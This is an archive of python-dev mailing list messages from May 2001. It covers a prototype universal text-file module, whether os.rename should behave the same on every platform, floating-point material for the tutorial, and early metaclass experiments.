> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you havn't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that impliments a line-ending-neutral text
file class. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implimentation. I doubt anyone would find the
methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker at home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
-------------- next part --------------
#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and a new parameter has been added.

    Call:

    file = open(filename,flags = "",bufsize = -1, LineEndingType = ""):
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there is both "w" and "t" than the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 200
    characters. If you will be reading files with many lines over 200
    characters long, you should set this number to the largest expected
    line length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrary formated text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
    def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        if LineEndingType == "native":
            self.LineSep = os.linesep()
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file posistion is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a a mximum of that many
        bytes. It will not round up, as the regular readline does. This
        means that if your buffer size is less thatn the length of the
        next line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very usefull, and allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it tranlates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could gbe patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
    

From guido at digicool.com  Wed May 23 01:46:53 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
             <15114.57378.887742.531145@beluga.mojam.com> 
References: <15114.57378.887742.531145@beluga.mojam.com> 
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 01:50:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
             <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Wed May 23 02:17:59 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido at digicool.com  Wed May 23 02:20:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
             <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May 23 02:23:42 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway eexplaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&
        aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward at python.net  Wed May 23 02:33:11 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward at python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one at home.com  Wed May 23 08:31:29 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.

Your lack of luck with the first half of their examples is indeed solely due
to that he used single-precision examples and Python's float is double.  You
need to find different numbers to show the same things in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.


From tim.one at home.com  Wed May 23 08:44:14 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obvious, it also fails if target simply exists and is open (you can't
unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows, via doing the right
system magic to make rename happen at reboot time before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH at ActiveState.com  Wed May 23 10:55:17 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want
> an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, The Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf at artcom-gmbh.de  Wed May 23 09:49:13 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip at pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest to add an optional third boolean parameter to 
os.rename called 'replace', which defaults either to TRUE or FALSE, so 
modifying existing apps  will become even less hassle to potential porters.  
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack at oratrix.nl  Wed May 23 13:15:10 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip at pobox.com  Wed May 23 13:59:45 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one at home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip at pobox.com  Wed May 23 14:11:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
	<m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest to add an optional third boolean
    Peter> parameter to os.rename called 'replace', which defaults either to
    Peter> TRUE or FALSE, so modifying existing apps will become even less
    Peter> hassle to potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic.  This is just not going to be possible.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.

Skip


From guido at digicool.com  Wed May 23 15:19:24 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
             <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:32:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
             <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:52:02 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
             <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de> 
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest to add an optional third boolean parameter to
> os.rename called 'replace', which defaults either to TRUE or FALSE,
> so modifying existing apps will become even less hassle to potential
> porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Wed May 23 16:00:25 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but
unfortuantely I'm now called away on a suprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now,
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine sourcecode, and its imap server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz at rahul.net  Wed May 23 16:08:45 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller at ion-tof.com  Wed May 23 19:28:07 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.


From guido at digicool.com  Wed May 23 20:02:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
             <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>  
            <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> >From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, which is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html

> I've ever since played with this metaclass hook, and
> always found the problem that B would have to completely
> simulate the normal python behaviour for classes (modifying
> of course what you want to change).
> 
> The problem is that there are a lot of successful and
> unsucessful attribute lookups, which require a lot
> of overhead when implemented in Python: So the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    ...

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).

> ------
> 
> Python 2.1 allows to attach attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May 23 20:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as Avantgo Channel.

Here's the URL for adding the channel:
